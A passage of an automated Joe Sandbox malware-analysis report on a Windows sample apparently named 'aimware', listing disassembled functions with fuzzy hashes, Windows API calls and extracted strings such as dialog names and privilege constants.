Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3cc37f7091d009d3bc9462fea326c3857089d4536b1cc31393f805f12bb3289
Instruction ID: a386b415ff11cfde27812e58aa5c71ee2f1d5623d1e5e835e0969e51e8c774b3
Opcode Fuzzy Hash: b3cc37f7091d009d3bc9462fea326c3857089d4536b1cc31393f805f12bb3289
Instruction Fuzzy Hash: 0BE14A755083948FC304CFA9D89486ABFF0EF9A300F45095EF9D497352C635EA1ADBA2

Function 00AC4088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 183ee45af543728f7b387d2f707a84d78c5745bf76f3a9d959adb30fadd1fe3f
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: 299179B02003458BDB24EFA4D9A1FFE77D9EBA8300F11092DF997C7282DA749545C35A

Function 00AC43BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 658ee8c76416bcc14fc0a6a95128ebe5c8def5660db094ea76860257193834df
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 8681AE713043464FDF28DF68D9E0FBD37D4ABA8304F12492DE9C68B282DA748D85835A

Function 00AD51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abff82a45044fa5f7c74818aeee2ecfaec2f73f3cfed1d49b598eb392a4db6d8
Instruction ID: 02242f85825ed61d330865ccd74d43427c77df95980245dc3ce3ee2bc2384b38
Opcode Fuzzy Hash: abff82a45044fa5f7c74818aeee2ecfaec2f73f3cfed1d49b598eb392a4db6d8
Instruction Fuzzy Hash: D6617771E40F086BDA389B78A9A5BFE33A4EF11380F14061BE483DF381D6A1DD4A8651

Function 00AD4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 9f0302b13c0cc4fbd528f0f93315c49c94ec5044a057d386214ef1b0534a32a8
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 16513274E00E445BDF38977C8656BBE73E59B1A700F18092BE883CB392C625ED4587A2

Function 00ABEFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9463ca39878643c65746e3b2d4329bc25dee014d8bc3c2e35bac01c7b61529eb
Instruction ID: e5e883622aa3f9f24b6021283d0322e5276d26cb29e6f6a12ad8b24eb9cc724a
Opcode Fuzzy Hash: 9463ca39878643c65746e3b2d4329bc25dee014d8bc3c2e35bac01c7b61529eb
Instruction Fuzzy Hash: 8251D1315093D58ED702DF38D9404AEBFF4AE9A314F4D09AEE4D95B243D221DA4ACB62

Function 00AC00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39224ac6cebbb2b8b38717d533029f5d73217b31f2699d67394b828553ffd7a4
Instruction ID: c94de785865ab241986a5965ab8e35651c52252518316f2f1bd404b56d6ace1d
Opcode Fuzzy Hash: 39224ac6cebbb2b8b38717d533029f5d73217b31f2699d67394b828553ffd7a4
Instruction Fuzzy Hash: DD51E0B1A087119FC748CF19D480A5AF7E1FF88314F058A2EE899E3340D735E959CB96

Function 00AC3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 0827204d4591f6d15158261e58b464edeb46d14d9a31e1a70f996299d5dbe58a
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: D331FA72A147468FCB18DF58C8516AEBBE0FB95304F11892DE495C7742C735EA0ACB91

Function 00ABE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00ABE30E

Part of subcall function 00AB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB40A5

Part of subcall function 00AC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00AF1030,00000200,00ABD928,00000000,?,00000050,00AF1030), ref: 00AC1DC4

_strlen.LIBCMT ref: 00ABE32F
SetDlgItemTextW.USER32(?,00AEE274,?), ref: 00ABE38F
GetWindowRect.USER32(?,?), ref: 00ABE3C9
GetClientRect.USER32(?,?), ref: 00ABE3D5
GetWindowLongW.USER32(?,000000F0), ref: 00ABE475
GetWindowRect.USER32(?,?), ref: 00ABE4A2
SetWindowTextW.USER32(?,?), ref: 00ABE4DB
GetSystemMetrics.USER32(00000008), ref: 00ABE4E3
GetWindow.USER32(?,00000005), ref: 00ABE4EE
GetWindowRect.USER32(00000000,?), ref: 00ABE51B
GetWindow.USER32(00000000,00000002), ref: 00ABE58D

Strings

$%s:, xrefs: 00ABE302
CAPTION, xrefs: 00ABE4BD
d, xrefs: 00ABE3F5

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 416406e7a72dbcd7ea8c7b6cfb837b5f198244fda84042e8b5aa363078daafd4
Instruction ID: 65086eb79107674abfcb9b88586d3bd11056b0c20a27f8b61775821c95bf7ddf
Opcode Fuzzy Hash: 416406e7a72dbcd7ea8c7b6cfb837b5f198244fda84042e8b5aa363078daafd4
Instruction Fuzzy Hash: F281B272208341AFD710DFA8CD88AAFBBECEB89704F04491DFA85A7251D731E9058B52

Function 00ADCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00ADCB66

Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC71E
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC730
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC742
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC754
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC766
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC778
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC78A
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC79C
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC7AE
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC7C0
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC7D2
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC7E4
Part of subcall function 00ADC701: _free.LIBCMT ref: 00ADC7F6

_free.LIBCMT ref: 00ADCB5B

Part of subcall function 00AD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?), ref: 00AD8DE2
Part of subcall function 00AD8DCC: GetLastError.KERNEL32(?,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?,?), ref: 00AD8DF4

_free.LIBCMT ref: 00ADCB7D
_free.LIBCMT ref: 00ADCB92
_free.LIBCMT ref: 00ADCB9D
_free.LIBCMT ref: 00ADCBBF
_free.LIBCMT ref: 00ADCBD2
_free.LIBCMT ref: 00ADCBE0
_free.LIBCMT ref: 00ADCBEB
_free.LIBCMT ref: 00ADCC23
_free.LIBCMT ref: 00ADCC2A
_free.LIBCMT ref: 00ADCC47
_free.LIBCMT ref: 00ADCC5F

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9645fdb956cb04aed24a8e3e26950dc09e60b0bdad4ff5e34429810e464f4ac6
Instruction ID: 74f7e6538d9025f53d6dccd2085f54d2034071ef8e9ef4a4888cfa4a7d71d7bc
Opcode Fuzzy Hash: 9645fdb956cb04aed24a8e3e26950dc09e60b0bdad4ff5e34429810e464f4ac6
Instruction Fuzzy Hash: 37315C31600306AFEB20AB39D946B5AB7EAAF54320F50442BF19AD7392DF75ED40CB10

Function 00AC9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AC9736
_wcslen.LIBCMT ref: 00AC97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00AC97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00AC9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00AC982D

Strings

<html>, xrefs: 00AC9755, 00AC978E
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00AC9760
utf-8"></head>, xrefs: 00AC976B
</html>, xrefs: 00AC97B7

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: e11c092e0b522bdba1c901b6f6813df27e12fd0fc6348ff457f699759417066f
Instruction ID: ea549b92ac1698c6a86bd726312d9f9673eac9ca6e2230187042ccd9df27a0b9
Opcode Fuzzy Hash: e11c092e0b522bdba1c901b6f6813df27e12fd0fc6348ff457f699759417066f
Instruction Fuzzy Hash: 953146325083417BEB25AF649C4AFAF779CAF42710F15051EF502A72D2FF64DA0983A6

Function 00ACD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00ACD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00ACD6ED

Part of subcall function 00AC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00ABC116,00000000,.exe,?,?,00000800,?,?,?,00AC8E3C), ref: 00AC1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00ACD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00ACD720
GetObjectW.GDI32(00000000,00000018,?), ref: 00ACD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00ACD75D
DeleteObject.GDI32(00000000), ref: 00ACD764
GetWindow.USER32(00000000,00000002), ref: 00ACD76D

Strings

STATIC, xrefs: 00ACD6F3

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 27b6bb57a6c713f251b43fab07823a508887090941e0c367a6f601aa84d41b26
Instruction ID: e7c6ce2acc9922ff2f314f6155e9d7071c30ca2f4d14ba2bb11973f3f9838e2d
Opcode Fuzzy Hash: 27b6bb57a6c713f251b43fab07823a508887090941e0c367a6f601aa84d41b26
Instruction Fuzzy Hash: 3C113A326403107BE6206B709D4EFEF76DCAF14B11F428138FA01B2092EB748B0542A5

Function 00AD96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD9705

Part of subcall function 00AD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?), ref: 00AD8DE2
Part of subcall function 00AD8DCC: GetLastError.KERNEL32(?,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?,?), ref: 00AD8DF4

_free.LIBCMT ref: 00AD9711
_free.LIBCMT ref: 00AD971C
_free.LIBCMT ref: 00AD9727
_free.LIBCMT ref: 00AD9732
_free.LIBCMT ref: 00AD973D
_free.LIBCMT ref: 00AD9748
_free.LIBCMT ref: 00AD9753
_free.LIBCMT ref: 00AD975E
_free.LIBCMT ref: 00AD976C

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 01650a7cb0b0363f41ab76bcb488cbb486caeac9b144844ed5dd0ed96ffa4cc5
Instruction ID: a4b82efbc921122e49044378549b752dbb34f81f93bfac6f5fc4a36db891c9a3
Opcode Fuzzy Hash: 01650a7cb0b0363f41ab76bcb488cbb486caeac9b144844ed5dd0ed96ffa4cc5
Instruction Fuzzy Hash: 1C11C876110109BFCB01EF54CA42CDD3BB6EF58350B5154A2FA4A8F2B2DE36EE509B84

Function 00AD2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00AD2F50
___TypeMatch.LIBVCRUNTIME ref: 00AD305E
_UnwindNestedFrames.LIBCMT ref: 00AD31B0
CallUnexpected.LIBVCRUNTIME ref: 00AD31CB
_abort.LIBCMT ref: 00AD31D0

Strings

csm, xrefs: 00AD2EDB
csm, xrefs: 00AD2F87
csm, xrefs: 00AD2E6E

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 95022bf5dbf3e6b1e35525bb3f0a615e20a68953251079710a92cd4911aabbb6
Instruction ID: 7279d1ed6204fabab88dbf92f0bddb8d2c3e8521ba0a9bfdadb7fb4062cc2acb
Opcode Fuzzy Hash: 95022bf5dbf3e6b1e35525bb3f0a615e20a68953251079710a92cd4911aabbb6
Instruction Fuzzy Hash: 3CB1487690020AEFCF25DFA4C981AAEBBB5BF14310F14455BF8166B312D731DA61CB92

Function 00AB6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB6FAA
_wcslen.LIBCMT ref: 00AB7013
_wcslen.LIBCMT ref: 00AB7084

Part of subcall function 00AB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00AB7AAB
Part of subcall function 00AB7A9C: GetLastError.KERNEL32 ref: 00AB7AF1
Part of subcall function 00AB7A9C: CloseHandle.KERNEL32(?), ref: 00AB7B00

Strings

\??\, xrefs: 00AB702B
SeRestorePrivilege, xrefs: 00AB6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 00AB6FCC
UNC\, xrefs: 00AB7051

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 4e71a6a588298900001750da430eff48856e707ec66eaf3d1f1fe474c06bfcda
Instruction ID: 421a8895c5811fb8b7937642f502493a95a8eb3045ef0b5e15e23315d5022bbd
Opcode Fuzzy Hash: 4e71a6a588298900001750da430eff48856e707ec66eaf3d1f1fe474c06bfcda
Instruction Fuzzy Hash: A7412BB1D08384BAEF20E7749D86FEE77AC9F54304F004556FA46A7183D6B4AA488731

Function 00ACB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB1316: GetDlgItem.USER32(00000000,00003021), ref: 00AB135A
Part of subcall function 00AB1316: SetWindowTextW.USER32(00000000,00AE35F4), ref: 00AB1370

EndDialog.USER32(?,00000001), ref: 00ACB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00ACB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00ACB650
SetWindowTextW.USER32(?,?), ref: 00ACB661
GetDlgItem.USER32(?,00000065), ref: 00ACB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00ACB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00ACB694

Strings

LICENSEDLG, xrefs: 00ACB5D4

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: f5612d240117a4efae0307b9e9854d6559a558001c88fed748b2bee16c78506c
